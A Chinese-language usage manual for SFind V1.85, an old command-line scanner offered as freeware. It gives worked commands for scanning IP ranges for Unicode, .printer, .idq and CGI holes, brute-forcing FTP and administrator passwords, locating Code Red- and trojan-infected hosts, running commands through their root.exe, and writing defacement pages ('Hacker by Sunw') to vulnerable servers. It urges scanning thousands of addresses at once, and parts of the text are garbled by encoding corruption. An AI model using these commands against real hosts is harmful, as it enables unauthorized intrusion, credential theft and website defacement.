sfind.exe是一款很優(yōu)秀的掃描工具，被部分黑客用來入侵但其實是安全工具,臨時推出SFindV1.85，增加了紅色代碼病毒主機的掃描，-um功能支持紅色代碼主機，可以直接修改其主頁，提供暴力破解ftp測試，此版的暴力破解為測試用，希望個位網(wǎng)友能及時將測試結(jié)果以及測試環(huán)境發(fā)給我，使SFind的暴力破解功能盡快推出，由于本人不智，耽誤了V1.9的正常發(fā)布，特此向各位道歉?。。⊥瑫r也請您繼續(xù)關(guān)注SFind的發(fā)展！謝謝?。?
　　FTP暴力破解測試方法：SFind -cracker FTP ftp服務(wù)器地址 用戶名 smallletter
　　紅色部分為用戶填寫，其余參數(shù)不變，參數(shù)smllletter是指探測密碼類型，在此為小寫字符~
　　使 用 說 明
　　SFind是一款命令方式的多線程掃描工具，最大的特點是它不包含任何附屬文件，體積小、掃描速度快、攜
　　帶方便，掃描進度顯示，僅僅只有一個EXE文件，在掃描完成后將結(jié)果保存到sfind.txt中。目前支持的功能
　　有(請大家支持本軟件，一起找BUG，謝謝！)：
　　端口掃描
　　CGI漏洞掃描
　　unicode漏洞掃描
　　.printer漏洞掃描
　　.idq漏洞掃描
　　FTP 匿名登陸掃描、通過FTP掃描administrator弱密碼
　　codered 病毒主機掃描 新功能?。?！
　　利用unicode漏洞直接修改主頁、利用codered病毒修改主頁 新功能?。?！
　　下面看看詳細說明和運行實例：
　　-p <端口開始端口 結(jié)束端口> 〈IP 地址開始地址 結(jié)束地址〉
　　端口掃描
　?。捍朔绞娇梢話呙铇藴识丝?、自定義端口、可以對某一段地址內(nèi)的指定端口掃描,如果不指定端口則掃描標準端口，目前的標準端口為10個，分別是：21、23、25、53、79、80、110、1143、3389、5631。
　　SFind -p 192.168.0.1
　　掃描192.168.0.1的標準端口
　　SFind -p 192.168.0.1 192.168.0.255
　　掃描192.168.0.1到192.168.0.255范圍內(nèi)所有主機的標準端口
　　SFind -p 1 200 192.168.0.1
　　掃描192.168.0.1主機1到200的端口此方式只能一次掃描一臺主機
　　SFind -p 21 192.168.0.1
　　掃描192.168.0.1主機的21端口
　　SFind -p 21 192.168.0.1 192.168.0.255
　　掃描192.168.0.1到192.168.0.255中所有開放21端口的主機,可以利用此功能查找開放終端服務(wù)(端口3389)的主機，也可以利用此功能快速查找中木馬冰河(端口7626)的主機
　　-cgi
　　cgi漏洞掃描：目前可以檢測784個CGI漏洞，此方式只能掃描一臺主機
　　SFind -cgi 192.168.0.1
　　掃描192.168.0.1的CGI漏洞
　　-uni <開始地址> <結(jié)束地址>
　　unicode漏洞掃描：如果不指定結(jié)束地址則只掃描一臺主機，如果找到漏洞主機可以使用-um功能進行頁面修改
　　SFind -uni 192.168.0.1 192.168.0.255
　　掃描192.168.0.1到192.168.0.255范圍內(nèi)所有unicode漏洞主機
　　-pri <開始地址> <結(jié)束地址>
　　.printer漏洞掃描：這是個遠程溢出漏洞，具體就不介紹了，如果不指定結(jié)束地址則掃描一臺主機
　　SFind -pri 192.168.0.1 192.168.0.255
　　掃描192.168.0.1 192.168.0.255范圍內(nèi)所有存在.printer漏洞的主機
　　-idq <開始地址> <結(jié)束地址>
　　.idq漏洞掃描：掃描.idq遠程溢出漏洞，如果不指定結(jié)束地址則掃描一臺主機
　　SFind -idq 192.168.0.1 192.168.0.255
　　掃描192.168.0.1到192.168.0.255范圍內(nèi)所有存在.idq漏洞的主機
　　-um <信息>
　　對存在unicode漏洞的主機和有codered病毒的主機進行頁面修改，默認的WEB路徑是c:\inetpub\wwwroot,使用此功能在對方機器的指定目錄生成index.htm、index.asp、default.htm、default.asp四個文件，文件信息自己定義，大家可以在自己的機器上試試此功能
　　SFind -um 192.168.0.1 Hacker+by+Sunw
　　此命令將在192.168.0.1的c:\inetpub\wwwroot目錄生成上敘四個文件，內(nèi)容為:HackerbySunw
　　SFind -um 192.168.0.1 c:\inetpub\ts Hacker+by+Sunw
　　此命令在192.168.0.1的c:\inetpub\ts目錄生成上敘四個文件，內(nèi)容為：Hacker by Sunw
　　在使用此功能時必須要有權(quán)限對目錄進行操作，如果在wwwroot目錄不成功，可以換到inetpub\ts目錄，這個目錄可以寫，信息內(nèi)容不能超過50個字符，可以是英文也可以是中文(如果是中文則不能超過25個字)，在寫信息時空格字符用+號代替，中間不能有"<"、">"和"="符號。如果是上傳到inetpub\ts目錄，則可以通過在瀏覽器調(diào)用//xxx.xxx.xxx.xxx/ts/default.asp查看
　　-ftp <開始地址> <結(jié)束地址> [-admin]
　　FTP掃描：掃描允許匿名登陸的FTP服務(wù)器，如果加-admin參數(shù)則通過FTP服務(wù)器掃描administrator弱密碼,如不指定結(jié)束地址則只掃描一臺主機
　　SFind -ftp 192.168.0.1 192.168.0.255
　　此命令掃描192.168.0.1到192.168.0.255范圍內(nèi)所有允許匿名登陸的主機
　　SFind -ftp 192.168.0.1 192.168.0.255 -admin
　　此命令通過FTP服務(wù)器掃administrator弱密碼，因為administrator在默認情況下是FTP服務(wù)的管理者，所以可以利用次特征掃描超級用戶的口令。在綠盟xdowns56kModem上掃4000個ip地址絕不超過5分鐘，所以利用此功能時請務(wù)必加大搜索力度，一次掃3000說什么也不過分
　　-codered <開始地址> <結(jié)束地址>
　　codered病毒主機掃描：掃描存在codered病毒的主機，此功能利用codered病毒會將cmd.exe復(fù)制到inetpub\ts目錄下root.exe的特性進行測試,如果對方主機inetpub\ts目錄存在root.exe則認為有codered病毒，可以直接通過瀏覽器調(diào)用root.exe,//地址/ts/root.exe？/c,具體的操作和unicode漏洞完全相同，如果要修改主頁可以直接使用SFind的um功能！
　　SFind -codered 192.168.0.1 192.168.0.255
　　此命令掃描192.168.0.1 192.168.0.255范圍內(nèi)所有存在紅色代碼病毒的主機
　　本軟件采用多線程掃描，如果網(wǎng)速過慢可能會擁擠導(dǎo)致無法正確掃描，可以按Ctrl+C中斷掃描，在進行掃描時上次的掃描結(jié)果將被覆蓋。
　　軟件為免費軟件可以任意復(fù)制，如果利用此軟件做違法的事情，使用者自行承擔責任。目前為測試版本，可能存在種種漏洞，如果您有發(fā)現(xiàn)或者有好的建議或意見請E-mailtoSunwMail@163.net也可以到我的主頁 //sw_sun.myetang.com 留言給我，十分感謝您的測試！